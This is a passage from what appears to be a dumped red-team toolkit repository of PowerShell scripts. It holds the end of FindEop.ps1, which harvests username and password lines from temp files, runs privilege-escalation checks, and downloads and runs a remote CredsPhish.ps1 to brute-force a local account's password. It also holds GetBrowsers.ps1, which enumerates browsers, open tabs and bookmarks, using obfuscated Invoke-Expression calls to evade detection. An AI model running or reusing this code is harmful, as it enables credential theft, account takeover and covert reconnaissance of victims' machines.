'$Env:TMP'\"\r\n   $FilesToScan = (Get-ChildItem \"$Env:TMP\" -EA SilentlyContinue).FullName|Where-Object {$_ -iMatch '(.log|.txt|.xml)$'}\r\n   ForEach($FoundFile in $FilesToScan)\r\n   {\r\n      $UserCreds = Get-Content -Path \"$FoundFile\" -EA SilentlyContinue|Where-Object {$_ -iMatch '(Username|User:|user name)'}\r\n      If($UserCreds)\r\n      {\r\n         #Adding values to output DataTable!\r\n         $FoundName = $FoundFile.Split('\\\\')[-1]\r\n         $credstable.Rows.Add(\"$FoundName\",\"$UserCreds\")|Out-Null\r\n      }\r\n\r\n      $PassCreds = Get-Content -Path \"$FoundFile\" -EA SilentlyContinue|Where-Object {$_ -iMatch '(pass|Password|passwd)'}\r\n      If($PassCreds)\r\n      {\r\n         #Adding values to output DataTable!\r\n         $FoundName = $FoundFile.Split('\\\\')[-1]\r\n         $credstable.Rows.Add(\"$FoundName\",\"$PassCreds\")|Out-Null\r\n      }\r\n\r\n   }\r\n\r\n   #Display output DataTable\r\n   $credstable | Format-Table -AutoSize | Out-String -Stream | 
Select-Object -SkipLast 1 | ForEach-Object {\r\n      $stringformat = If($_ -iMatch '^(FileName)')\r\n      {\r\n         @{ 'ForegroundColor' = 'Green' }\r\n      }\r\n      Else\r\n      {\r\n         @{ 'ForegroundColor' = 'White' }\r\n      }\r\n      Write-Host @stringformat $_\r\n   }\r\n\r\n}\r\nElse\r\n{\r\n   Write-Host \"[DIRECTORY] NotFound : '$Env:TMP'\" -ForeGroundColor Red \r\n}\r\n\r\n\r\n#return to pwd\r\ncd $LocalPath\r\nWrite-Host \"\"\r\n\r\n\r\n#FINAL TESTS USING SHERLOCK CMDLET\r\nIf($verb -ieq \"False\")\r\n{\r\n   Import-Module -Name \"$Env:TMP\\Sherlock.ps1\" -Force;Find-AllVulns\r\n}\r\nElse\r\n{\r\n   #NOTE: FindEop.ps1 -verb 'true' - triggers dll-hijacking checks\r\n   Import-Module -Name \"$Env:TMP\\Sherlock.ps1\" -Force;Get-DllHijack;Find-AllVulns\r\n}\r\nRemove-Item -Path \"$Env:TMP\\Sherlock.ps1\" -Force -ErrorAction SilentlyContinue\r\n\r\n\r\n#Define Batch title again because sherlock.ps1 changed it ..\r\n$host.UI.RawUI.WindowTitle = \"@FindEop $BatVersion {SSA RedTeam @2022}\"\r\n\r\n\r\nIf($BruteForce -ne \"false\")\r\n{\r\n\r\n   <#\r\n   .SYNOPSIS\r\n      Author: @r00t-3xp10it\r\n      Helper - Brute force user accounts passwords\r\n\r\n   .EXAMPLE\r\n      PS C:\\> .\\FindEop.ps1 -bruteforce 'true'\r\n      Scans for EOP and brute force user account pass\r\n\r\n   .EXAMPLE\r\n      PS C:\\> .\\FindEop.ps1 -bruteforce 'pedro'\r\n      Scans for EOP and brute force pedro account pass\r\n   #>\r\n\r\n   #Define the type of scan\r\n   If($BruteForce -ne \"true\")\r\n   {\r\n      #User input account name\r\n      $UserAccountName = \"$BruteForce\"\r\n   }\r\n   Else\r\n   {\r\n      #Auto brute the active user account name\r\n      $UserAccountName = $([Environment]::UserName)\r\n   }\r\n\r\n   Write-Host \"`nBRUTE FORCING '$UserAccountName' USER ACCOUNT\"\r\n   Write-Host \"[i] Dicionary file contains '59.186' passwords.\" -ForegroundColor Yellow\r\n   Write-Host \"-----------------------------------------------\"\r\n   #Download 
auxiliary cmdlet from my GitHub into %tmp% directory\r\n   iwr -Uri \"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/modules/CredsPhish.ps1\" -OutFile \"$Env:TMP\\CredsPhish.ps1\"|Unblock-File\r\n   If(Test-Path -Path \"$Env:TMP\\CredsPhish.ps1\" -EA SilentlyContinue)\r\n   {\r\n      powershell -File \"$Env:TMP\\CredsPhish.ps1\" -PhishCreds Brute -Dicionary \"$Env:TMP\\passwords.txt\" -UserAccount \"$UserAccountName\"\r\n      Remove-Item -Path \"$Env:TMP\\CredsPhish.ps1\" -EA SilentlyContinue -Force\r\n   }\r\n   Else\r\n   {\r\n      Write-Host \"[ERROR] Fail to download '$Env:TMP\\CredsPhish.ps1'\" -ForegroundColor Red -BackgroundColor Black\r\n   }\r\n\r\n}\r\n\r\nexit"
  },
  {
    "path": "mimiRatz/GetBrowsers.ps1",
    "content": "﻿\r\n$Path = $null\r\n$mpset = $False\r\n$RUIUIUi0 = 'no'\r\n$cmdletver = \"1.20.7\"\r\n$IPATH = ($pwd).Path.ToString()\r\n$param1 = $args[0] # User Inputs [Arguments]\r\n$param2 = $args[1] # User Inputs [Arguments]\r\n$host.UI.RawUI.WindowTitle = \"@GetBrowsers v$cmdletver\"\r\n$ErrorActionPreference = \"SilentlyContinue\"\r\n\r\n## Auto-Set @Args in case of User empty inputs (Set LogFile Path).\r\nIf(-not($param2)){$LogFilePath = \"$env:TMP\"}else{If($param2 -match '^[0-9]'){$LogFilePath = \"$env:TMP\";$param2 = $param2}else{$LogFilePath = \"$param2\";$mpset = $True}}\r\nIf(-not($param1)){\r\n    ## Required (Mandatory) Parameters/args Settings\r\n    echo \"`nGetBrowsers - Enumerate installed browser(s) information .\" > $LogFilePath\\BrowserEnum.log\r\n    echo \"[ ERROR ] This script requires parameters (-args) to run ..`n\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"Syntax: [scriptname] [-arg <mandatory>] [arg <optional>]`n\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"The following mandatory args are available:\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"./GetBrowsers.ps1 -RECON            Fast recon (browsers versions interface)\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"./GetBrowsers.ps1 -WINVER           Enumerates remote sys default settings.\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"./GetBrowsers.ps1 -IE               Enumerates IE browser information Only.\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"./GetBrowsers.ps1 -ALL              Enumerates IE, Firefox, Chrome information.\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"./GetBrowsers.ps1 -CHROME           Enumerates Chrome browser information Only.\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"./GetBrowsers.ps1 -FIREFOX          Enumerates Firefox browser information Only.\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"./GetBrowsers.ps1 -OPERA            Enumerates Opera browser information Only.\" >> $LogFilePath\\BrowserEnum.log\r\n    echo 
\"./GetBrowsers.ps1 -ADDONS           Enumerates ALL browsers extentions installed.\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"./GetBrowsers.ps1 -CLEAN            Enumerates|Delete ALL browsers cache files.`n\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"The following Optional args are available:\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"./GetBrowsers.ps1 -IE `$env:TMP      Enumerates browser and stores logfile to 'tmp'.\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"./GetBrowsers.ps1 -SCAN 135,139,445 Enumerates local|remote host open|closed tcp ports.`n\" >> $LogFilePath\\BrowserEnum.log\r\n    Get-Content $LogFilePath\\BrowserEnum.log;Remove-Item $LogFilePath\\BrowserEnum.log -Force\r\n        ## For those who insiste in running this script outside meterpeter\r\n        If(-not(Test-Path \"$env:tmp\\Update-KB4524147.ps1\")){\r\n            Start-Sleep -Seconds 6\r\n        }\r\n    Exit\r\n}\r\n\r\n\r\n## [GetBrowsers] PS Script Banner (Manual Run)\r\n# For those who insiste in running this script outside meterpeter\r\n#Write-Host \"GetBrowsers - Enumerate installed browser(s) information.\" -ForeGroundColor Green\r\nIf($mpset -eq $True){Write-Host \"[i] LogFile => $LogFilePath\\BrowserEnum.log\" -ForeGroundColor yellow}\r\nStart-sleep -Seconds 1\r\n\r\nIf($param1 -ne \"-CLEAN\" -or $param1 -ne \"-clean\")\r\n{\r\n   ## Get Default network interface\r\n   $DefaultInterface = Test-NetConnection -ErrorAction SilentlyContinue|Select-Object -expandproperty InterfaceAlias\r\n   If(-not($DefaultInterface) -or $DefaultInterface -eq $null){$DefaultInterface = \"{null}\"}\r\n\r\n   ## Get System Default Configurations\r\n   $RHserver = \"LogonServer  : \"+\"$env:LOGONSERVER\"\r\n   $Caption = Get-CimInstance Win32_OperatingSystem|Format-List *|findstr /I /B /C:\"Caption\"\r\n   If($Caption){$ParseCap = $Caption -replace '                                   :','      :'}else{$ParseCap = \"Caption      : Not Found\"}\r\n\r\n   ## Get System Default 
webBrowser\r\n   $DefaultBrowser = (Get-ItemProperty 'HKCU:\\Software\\Microsoft\\Windows\\Shell\\Associations\\UrlAssociations\\https\\UserChoice' -ErrorAction SilentlyContinue).ProgId\r\n   If($DefaultBrowser){$Parse_Browser_Data = $DefaultBrowser.split(\"-\")[0] -replace 'URL','' -replace 'HTML','' -replace '.HTTPS',''}else{$Parse_Browser_Data = \"Not Found\"}\r\n   $MInvocation = \"WebBrowser   : \"+\"$Parse_Browser_Data\"+\" (PreDefined)\";\r\n\r\n   ## Get System UserAgent string\r\n   $IntSet = Get-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\internet settings\" -Name 'User Agent' -ErrorAction SilentlyContinue|Select-Object 'User Agent'\r\n   If($IntSet){$ParsingIntSet = $IntSet -replace '@{User Agent=','UserAgent    : ' -replace '}',''}else{$ParsingIntSet = \"UserAgent    : Not Found\"}\r\n\r\n   ## Get Default Gateway IpAddress (IPV4)\r\n   $RGateway = (Get-NetIPConfiguration|Foreach IPv4DefaultGateway -ErrorAction SilentlyContinue).NextHop\r\n   If(-not($RGateway) -or $RGateway -eq $null){$RGateway = \"{null}\"}\r\n   $nwINFO = Get-WmiObject -ComputerName (hostname) Win32_NetworkAdapterConfiguration|Where-Object { $_.IPAddress -ne $null }\r\n   $DHCPName = $nwINFO.DHCPEnabled;$ServiceName = $nwINFO.ServiceName\r\n\r\n   ## Internet statistics\r\n   $recstats = netstat -s -p IP|select-string -pattern \"Packets Received\"\r\n   If($recstats){$statsdata = $recstats -replace '  Packets Received                   =','TCPReceived  :'}else{$statsdata = \"TCPReceived  : {null}\"}\r\n   $delstats = netstat -s -p IP|select-string -pattern \"Packets Delivered\"\r\n   If($delstats){$deliverdata = $delstats -replace '  Received Packets Delivered         =','TCPDelivered :'}else{$deliverdata = \"TCPDelivered : {null}\"}\r\n\r\n\r\n   ## Writting LogFile to the selected path in: { $param2 var }\r\n   echo \"`n`nSystem Defaults\" > $LogFilePath\\BrowserEnum.log\r\n   echo \"---------------\" >> $LogFilePath\\BrowserEnum.log\r\n   echo 
\"DHCPEnabled  : $DHCPName\" >> $LogFilePath\\BrowserEnum.log\r\n   echo \"Interface    : $DefaultInterface\" >> $LogFilePath\\BrowserEnum.log\r\n   echo \"ServiceName  : $ServiceName\" >> $LogFilePath\\BrowserEnum.log\r\n   echo \"$RHserver\" >> $LogFilePath\\BrowserEnum.log\r\n   echo \"$ParseCap\" >> $LogFilePath\\BrowserEnum.log \r\n   echo \"$ParsingIntSet\" >> $LogFilePath\\BrowserEnum.log\r\n\r\n   ## Get Flash Internal Name/Version\r\n   If(-not(Test-Path \"$env:WINDIR\\system32\\macromed\\flash\\flash.ocx\")){\r\n       echo \"flashName    : Not Found\" >> $LogFilePath\\BrowserEnum.log\r\n   }else{\r\n       $flash = Get-Item \"$env:WINDIR\\system32\\macromed\\flash\\flash.ocx\"|select *\r\n       $flashName = $flash.versioninfo.InternalName\r\n       echo \"flashName    : $flashName\" >> $LogFilePath\\BrowserEnum.log\r\n   }\r\n\r\n   echo \"$MInvocation\" >> $LogFilePath\\BrowserEnum.log\r\n   echo \"Gateway      : $RGateway\" >> $LogFilePath\\BrowserEnum.log\r\n   echo \"$statsdata\" >> $LogFilePath\\BrowserEnum.log\r\n   echo \"$deliverdata\" >> $LogFilePath\\BrowserEnum.log\r\n   ## END Off { @args -WINVER }\r\n}\r\n\r\n\r\nfunction ConvertFrom-Json20([object] $item){\r\n    $RawString = \"Ad\"+\"d-Ty\"+\"pe -Ass\"+\"emblyNa\"+\"me System.W\"+\"eb.Ext\"+\"ensions\" -Join ''\r\n    $JavaSerial = \"System.W\"+\"eb.Scri\"+\"pt.Serial\"+\"ization.Jav\"+\"aScriptSe\"+\"rializer\" -Join ''\r\n    $RawString|&('Sex' -replace 'S','I')\r\n    $powers_js = New-Object $JavaSerial\r\n    return ,$powers_js.DeserializeObject($item) \r\n}\r\n\r\nfunction BROWSER_RECON {\r\n\r\n    #Build output DataTable!\r\n    $datatable = New-Object System.Data.DataTable\r\n    $datatable.Columns.Add(\"Browser\")|Out-Null\r\n    $datatable.Columns.Add(\"Install\")|Out-Null\r\n    $datatable.Columns.Add(\"Status\")|Out-Null\r\n    $datatable.Columns.Add(\"Version\")|Out-Null\r\n    $datatable.Columns.Add(\"PreDefined\")|Out-Null\r\n\r\n    ## New MicrosoftEdge Update have changed 
the binary name to 'msedge' ..\r\n    $fpatth = \"HKLM:\\SOFT\"+\"WARE\\Microsoft\\In\"+\"ternet Explorer\" -join ''\r\n    $CheckVersion = (Get-ItemProperty -Path \"$fpatth\" -EA SilentlyContinue).version.ToString()\r\n    If($CheckVersion -lt '9.11.18362.0'){$ProcessName = \"MicrosoftEdge\"}else{$ProcessName = \"msedge\"}\r\n    $IETestings = (Get-Process $ProcessName -ErrorAction SilentlyContinue).Responding\r\n    If($IETestings -eq $True){$iStatus = \"Active\"}else{$iStatus = \"Stoped\"}\r\n    $FFTestings = (Get-Process firefox -ErrorAction SilentlyContinue).Responding\r\n    If($FFTestings -eq $True){$fStatus = \"Active\"}else{$fStatus = \"Stoped\"}\r\n    $CHTestings = (Get-Process chrome -ErrorAction SilentlyContinue).Responding\r\n    If($CHTestings -eq $True){$cStatus = \"Active\"}else{$cStatus = \"Stoped\"}\r\n    $OStatus = (Get-Process opera -ErrorAction SilentlyContinue).Responding\r\n    If($OStatus -eq $True){$OStatus = \"Active\"}else{$OStatus = \"Stoped\"}\r\n    $sfStatus = (Get-Process safari -ErrorAction SilentlyContinue).Responding\r\n    If($sfStatus -eq $True){$sfStatus = \"Active\"}else{$sfStatus = \"Stoped\"}\r\n    $BrStatus = (Get-Process brave -ErrorAction SilentlyContinue).Responding\r\n    If($BrStatus -eq $True){$BrStatus = \"Active\"}else{$BrStatus = \"Stoped\"}\r\n\r\n    ## Detect ALL Available browsers Installed and the PreDefined browser name\r\n    $DefaultBrowser = (Get-ItemProperty 'HKCU:\\Software\\Microsoft\\Windows\\Shell\\Associations\\UrlAssociations\\https\\UserChoice' -ErrorAction SilentlyContinue).ProgId\r\n    If($DefaultBrowser){$MInvocation = $DefaultBrowser.split(\"-\")[0] -replace 'URL','' -replace 'HTML','' -replace '.HTTPS',''}else{$MInvocation = $null}\r\n    $IEVersion = (Get-ItemProperty -Path \"HKLM:\\SOFTWARE\\Microsoft\\Internet Explorer\" -ErrorAction SilentlyContinue).version\r\n    If($IEVersion){$IEfound = \"Found\"}else{$IEfound = \"False\";$IEVersion = \"{null}\"}\r\n    $Chrome_App = 
(Get-ItemProperty \"HKCU:\\Software\\Google\\Chrome\\BLBeacon\" -ErrorAction SilentlyContinue).version\r\n    If($Chrome_App){$CHfound = \"Found\"}else{$CHfound = \"False\";$Chrome_App = \"{null}\"}\r\n    $SafariData = (Get-ChildItem -Path \"${Env:PROGRAMFILES(X86)}\\Safari\\Safari.exe\" -EA SilentlyContinue).VersionInfo.ProductVersion.ToString()\r\n    If($SafariData){$SFfound = \"Found\"}else{$SFfound = \"False\";$SafariData = \"{null}\"}\r\n    $BraveData = (Get-ChildItem -Path \"$Env:PROGRAMFILES\\BraveSoftware\\Brave-Browser\\Application\\brave.exe\" -EA SilentlyContinue).VersionInfo.ProductVersion.ToString()\r\n    If($BraveData){$Brfound = \"Found\"}else{$Brfound = \"False\";$BraveData = \"{null}\"}\r\n\r\n    #Check Opera versions number\r\n    If($MInvocation -iMatch 'Opera')\r\n    {\r\n       $OPfound = \"Found\"\r\n       If(Test-Path -Path \"$Env:LOCALAPPDATA\\Programs\" -Filter \"Opera???\" -EA SilentlyContinue)\r\n       {\r\n          $OPData = (Get-ChildItem -Path \"$Env:LOCALAPPDATA\\Programs\\Opera???\\launcher.exe\").VersionInfo.ProductVersion.ToString()\r\n       }\r\n       Else{$OPData = \"{null}\"}\r\n    }\r\n    Else\r\n    {\r\n       $OPfound = \"False\"\r\n    }\r\n\r\n\r\n    ## display predefined browser status\r\n    If($MInvocation -iMatch 'IE'){$id = \"True\";$fd = \"False\";$cd = \"False\";$OP = \"False\";$SF = \"False\";$Br = \"False\"}\r\n    If($MInvocation -iMatch 'brave'){$id = \"False\";$fd = \"False\";$cd = \"False\";$OP = \"False\";$SF = \"False\";$Br = \"True\"}\r\n    If($MInvocation -iMatch 'Opera'){$id = \"False\";$fd = \"False\";$cd = \"False\";$OP = \"True\";$SF = \"False\";$Br = \"False\"}\r\n    If($MInvocation -iMatch 'Safari'){$id = \"False\";$fd = \"False\";$cd = \"False\";$OP = \"False\";$SF = \"True\";$Br = \"False\"}\r\n    If($MInvocation -iMatch 'Chrome'){$id = \"False\";$fd = \"False\";$cd = \"True\";$OP = \"False\";$SF = \"False\";$Br = \"False\"}\r\n    If($MInvocation -iMatch 'Firefox'){$id = 
\"False\";$fd = \"True\";$cd = \"False\";$OP = \"False\";$SF = \"False\";$Br = \"False\"}\r\n    If($MInvocation -iMatch 'MSEdgeHTM'){$id = \"True\";$fd = \"False\";$cd = \"False\";$OP = \"False\";$SF = \"False\";$Br = \"False\"}\r\n    If(-not($MInvocation) -or $MInvocation -eq $null){$id = \"{Null}\";$fd = \"{Null}\";$cd = \"{Null}\";$OP = \"{Null}\";$SF = \"{Null}\";$Br = \"{Null}\"}\r\n\r\n    ## leak Firefox installed version\r\n    If(-not(Test-Path -Path \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\"))\r\n    {\r\n        $FFfound = \"False\";\r\n        $ParsingData = \"{null}\"\r\n    }\r\n    Else\r\n    {\r\n        $FFfound = \"Found\"\r\n        If(-not(Test-Path \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default\\prefs.js\"))\r\n        {\r\n            If(-not(Test-Path \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\\prefs.js\"))\r\n            {\r\n                $ParsingData = \"{null}\"\r\n            }\r\n            Else\r\n            {\r\n                $Preferencies = \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\\prefs.js\"\r\n                $JsPrefs = Get-content $Preferencies|Select-String \"extensions.lastPlatformVersion\"\r\n                $ParsingData = $JsPrefs[0] -replace 'user_pref\\(','' -replace '\\\"','' -replace ',','' -replace '\\);','' -replace 'extensions.lastPlatformVersion','' -replace ' ',''\r\n            }\r\n        }\r\n        Else\r\n        {\r\n            $Preferencies = \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default\\prefs.js\"\r\n            $JsPrefs = Get-content $Preferencies|Select-String \"extensions.lastPlatformVersion\"\r\n            $ParsingData = $JsPrefs[0] -replace 'user_pref\\(','' -replace '\\\"','' -replace ',','' -replace '\\);','' -replace 'extensions.lastPlatformVersion','' -replace ' ',''\r\n        }\r\n    }\r\n\r\n    #Adding values to output DataTable!\r\n    $ParsingData = (gp HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* 
|Select DisplayName, DisplayVersion|?{$_.DisplayName -iMatch 'Firefox'}).DisplayVersion\r\n    $datatable.Rows.Add(\"IE\",\"$IEfound\",\"$iStatus\",\"$IEVersion\",\"$id\")|Out-Null\r\n    $datatable.Rows.Add(\"CHROME\",\"$CHfound\",\"$cStatus\",\"$Chrome_App\",\"$cd\")|Out-Null\r\n    $datatable.Rows.Add(\"FIREFOX\",\"$FFfound\",\"$fStatus\",\"$ParsingData\",\"$fd\")|Out-Null\r\n    $datatable.Rows.Add(\"OPERA\",\"$OPfound\",\"$OStatus\",\"$OPData\",\"$OP\")|Out-Null\r\n    $datatable.Rows.Add(\"SAFARI\",\"$SFfound\",\"$sfStatus\",\"$SafariData\",\"$SF\")|Out-Null\r\n    $datatable.Rows.Add(\"BRAVE\",\"$Brfound\",\"$BrStatus\",\"$BraveData\",\"$Br\")|Out-Null\r\n    $datatable|Format-Table -AutoSize|Out-File -FilePath \"$LogFilePath\\BrowserEnum.log\" -Force\r\n\r\n    ## Get-NetAdapter { Interfaces Available }\r\n    $Interfaces = Get-NetAdapter | Select-Object Status,InterfaceDescription -EA SilentlyContinue\r\n    If($Interfaces){echo $Interfaces >> $LogFilePath\\BrowserEnum.log}\r\n}\r\n\r\n\r\nfunction OPERA {\r\n    ## Retrieve Opera Browser Information\r\n    echo \"`n`nOpera Browser\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"-------------\" >> $LogFilePath\\BrowserEnum.log\r\n\r\n    ## Set the Location of Opera prefs.js file\r\n    If(Test-Path \"$Env:LOCALAPPDATA\\Programs\\Opera???\\installer_prefs.json\")\r\n    {\r\n        ## Check browser: { active|StartTime|PID } Settings\r\n        $FFTestings = (Get-Process Opera -ErrorAction SilentlyContinue).Responding\r\n        If($FFTestings -eq $True){\r\n            $Status = \"Status       : Active\"\r\n            $BsT = Get-Process Opera|Select -ExpandProperty StartTime\r\n            $StartTime = $BsT[0];$FinalOut = \"StartTime    : $StartTime\"\r\n            $PPID = (Get-Process Opera|Select -Last 1).Id\r\n\r\n            echo \"$Status\" >> $LogFilePath\\BrowserEnum.log\r\n            echo \"$FinalOut\" >> $LogFilePath\\BrowserEnum.log\r\n            echo \"Process PID  : $PPID\" >> 
$LogFilePath\\BrowserEnum.log\r\n        }else{\r\n            $Status = \"Status       : Stoped\"\r\n            $PSID = \"Process PID  : {requires Opera process running}\"\r\n            $FinalOut = \"StartTime    : {requires Opera process running}\"\r\n            echo \"$Status\" >> $LogFilePath\\BrowserEnum.log\r\n            echo \"$FinalOut\" >> $LogFilePath\\BrowserEnum.log\r\n            echo \"$PSID\" >> $LogFilePath\\BrowserEnum.log\r\n        }\r\n\r\n        ## Get Browser Version { 76.0.11 }\r\n        $OperaVersionData = (Get-ChildItem -Path \"$Env:LOCALAPPDATA\\Programs\\Opera???\\launcher.exe\").VersionInfo.ProductVersion.ToString()\r\n        If($OperaVersionData)\r\n        {\r\n           echo \"Version      : $OperaVersionData\" >> $LogFilePath\\BrowserEnum.log\r\n        }\r\n        Else\r\n        {\r\n           echo \"Version      : {fail retriving version from launcher.exe}\" >> $LogFilePath\\BrowserEnum.log        \r\n        }\r\n\r\n        ## Get Opera.exe binary path\r\n        $BinaryPath = Get-Process Opera -EA SilentlyContinue|Select -Last 1\r\n        If(-not($BinaryPath) -or $BinaryPath -eq $null)\r\n        {\r\n            echo \"BinaryPath   : {requires Opera process running}\" >> $LogFilePath\\BrowserEnum.log\r\n        }\r\n        Else\r\n        {\r\n            $BinaryPath = Get-Process Opera|Select -ExpandProperty Path\r\n            $parseData = $BinaryPath[0]\r\n            echo \"BinaryPath   : $parseData\" >> $LogFilePath\\BrowserEnum.log\r\n        }\r\n\r\n        ## Get brownser startup page { https://www.google.pt }\r\n        $JsPrefs = Get-content \"$Env:LOCALAPPDATA\\Programs\\Opera???\\installer_prefs.json\" -EA SilentlyContinue\r\n        If($JsPrefs)\r\n        {\r\n            $ParseData = $JsPrefs -split(',');$Strip = $ParseData[38]\r\n            $ParsingData = $Strip -replace '\\\"}','' -replace '\"}','' -replace '\\\"welcome-url\\\":\\\"','HomePage     : '\r\n            echo \"$ParsingData\" >> 
$LogFilePath\\BrowserEnum.log\r\n        }\r\n        Else\r\n        {\r\n            $ParsingData = \"HomePage     : {fail to retrieve Browser HomePage}\"\r\n            echo \"$ParsingData\" >> $LogFilePath\\BrowserEnum.log\r\n        }\r\n\r\n\r\n        ## Get Opera Last Active Tab windowsTitle\r\n        echo \"`nActive Browser Tab\" >> $LogFilePath\\BrowserEnum.log\r\n        echo \"------------------\" >> $LogFilePath\\BrowserEnum.log\r\n        $checkProcess = Get-Process Opera -EA SilentlyContinue\r\n        If(-not($checkProcess))\r\n        {\r\n            echo \"{requires Opera process running}\" >> $LogFilePath\\BrowserEnum.log\r\n        }\r\n        Else\r\n        {\r\n            $StoreData = (Get-Process Opera).MainWindowTitle\r\n            $ParseData = $StoreData | where {$_ -ne \"\"}\r\n            $MyPSObject = $ParseData -replace '- Opera',''\r\n            echo \"$MyPSObject\" >> $LogFilePath\\BrowserEnum.log\r\n        }\r\n\r\n        #Get browser bookmarks\r\n        echo \"`nOpera Bookmarks\" >> $LogFilePath\\BrowserEnum.log\r\n        echo \"---------------\" >> $LogFilePath\\BrowserEnum.log\r\n        $GETbooks = (Get-ChildItem \"$Env:APPDATA\\Opera Software\\Opera*\" -Recurse -Force -Filter \"Bookmarks\").FullName\r\n        If($GETbooks)\r\n        {\r\n            $JsPrefs = Get-content \"$GETbooks\" -ErrorAction SilentlyContinue|Select-String \"`\"url`\":\"\r\n            $ParsingData = $JsPrefs -replace '\"url\":','' -replace '\"','' -replace ' ',''\r\n            echo $ParsingData >> $LogFilePath\\BrowserEnum.log             \r\n        }\r\n        Else\r\n        {\r\n            $ParsingData = \"{Could not find any Bookmarks}\"\r\n            echo \"$ParsingData\" >> $LogFilePath\\BrowserEnum.log        \r\n        }\r\n    \r\n    }\r\n    Else\r\n    {\r\n        echo \"{Could not find any Browser Info}\" >> $LogFilePath\\BrowserEnum.log    \r\n    }\r\n\r\n}\r\n\r\n\r\nfunction IE_Dump {\r\n    ## Retrieve IE Browser 
Information\r\n    echo \"`n`nIE Browser\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"----------\" >> $LogFilePath\\BrowserEnum.log\r\n    ## New MicrosoftEdge Update have changed the binary name to 'msedge' ..\r\n    $CheckVersion = (Get-ItemProperty -Path \"HKLM:\\SOFTWARE\\Microsoft\\Internet Explorer\" -ErrorAction SilentlyContinue).version\r\n    If($CheckVersion -lt '9.11.18362.0'){$ProcessName = \"MicrosoftEdge\"}else{$ProcessName = \"msedge\"}\r\n    $IEVersion = Get-ItemProperty -Path \"HKLM:\\SOFTWARE\\Microsoft\\Internet Explorer\" -Name 'Version' -ErrorAction SilentlyContinue|Select-Object 'Version'\r\n    If(-not($IEVersion) -or $IEVersion -eq $null){\r\n        echo \"{Could not find any Browser Info}\" >> $LogFilePath\\BrowserEnum.log\r\n    }else{\r\n        $IEData = $IEVersion -replace '@{Version=','Version      : ' -replace '}',''\r\n        $RegPrefs = Get-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Internet Explorer\\Main\\\" -Name 'start page'|Select-Object 'Start Page'\r\n        $ParsingData = $RegPrefs -replace '@{Start Page=','HomePage     : ' -replace '}',''\r\n        $LocalPage = Get-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Internet Explorer\\Main\\\" -Name 'Search Page'|Select-Object 'Search Page'\r\n        $ParsingLocal = $LocalPage -replace '@{Search Page=','SearchPage   : ' -replace '}',''\r\n        $IntSet = Get-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\internet settings\" -Name 'User Agent'|Select-Object 'User Agent'\r\n        $ParsingIntSet = $IntSet -replace '@{User Agent=','UserAgent    : ' -replace '}',''\r\n        $DownloadDir = Get-ItemProperty 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders' -Name \"{374DE290-123F-4565-9164-39C4925E467B}\"|findstr /I /C:\"Downloads\"\r\n        $ParseDownload = $DownloadDir -replace '{374DE290-123F-4565-9164-39C4925E467B} :','Downloads    :'\r\n        $logfilefolder = (Get-ItemProperty 
\"HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\").Cache\r\n        $dataparse = \"INetCache    : \"+\"$logfilefolder\"\r\n\r\n        $IETestings = (Get-Process -Name \"$ProcessName\" -EA SilentlyContinue).Responding\r\n        If(-not($IETestings) -or $IETestings -eq $null){\r\n            $Status = \"Status       : Stoped\"\r\n            $PSID = \"Process PID  : {requires $ProcessName process running}\"\r\n            $FinalOut = \"StartTime    : {requires $ProcessName process running}\"\r\n        }else{\r\n            $Status = \"Status       : Active\"\r\n            $BrowserStartTime = (Get-Process -Name \"$ProcessName\").StartTime.ToString()\r\n            $StartTime = $BrowserStartTime[0];$FinalOut = \"StartTime    : $StartTime\"\r\n            $ProcessPID = (Get-Process -Name \"$ProcessName\"|Select -Last 1).Id.ToString()\r\n            $PSID = \"Process PID  : $ProcessPID\"\r\n        }\r\n\r\n        ## Writting LogFile to the selected path in: { $param2 var }\r\n        echo \"$Status\" >> $LogFilePath\\BrowserEnum.log\r\n        echo \"$IEData\" >> $LogFilePath\\BrowserEnum.log\r\n        echo \"$ParseDownload\" >> $LogFilePath\\BrowserEnum.log\r\n        echo \"$ParsingData\" >> $LogFilePath\\BrowserEnum.log\r\n        echo \"$ParsingLocal\" >> $LogFilePath\\BrowserEnum.log\r\n        echo \"$dataparse\" >> $LogFilePath\\BrowserEnum.log\r\n    }\r\n\r\n    <#\r\n    $BinaryPathName = Get-Process $ProcessName -ErrorAction SilentlyContinue\r\n    If(-not($BinaryPathName) -or $BinaryPathName -eq $null){\r\n        echo \"BinaryPath   : {requires $ProcessName process running}\" >> $LogFilePath\\BrowserEnum.log\r\n    }else{\r\n        $BinaryPathName = (Get-Process -Name $ProcessName).Path.ToString()\r\n        $parseData = $BinaryPathName[0]\r\n        echo \"BinaryPath   : $parseData\" >> $LogFilePath\\BrowserEnum.log\r\n    }\r\n\r\n    ## leak From previous Functions { StartTime|PID }\r\n    echo \"$FinalOut\" >> 
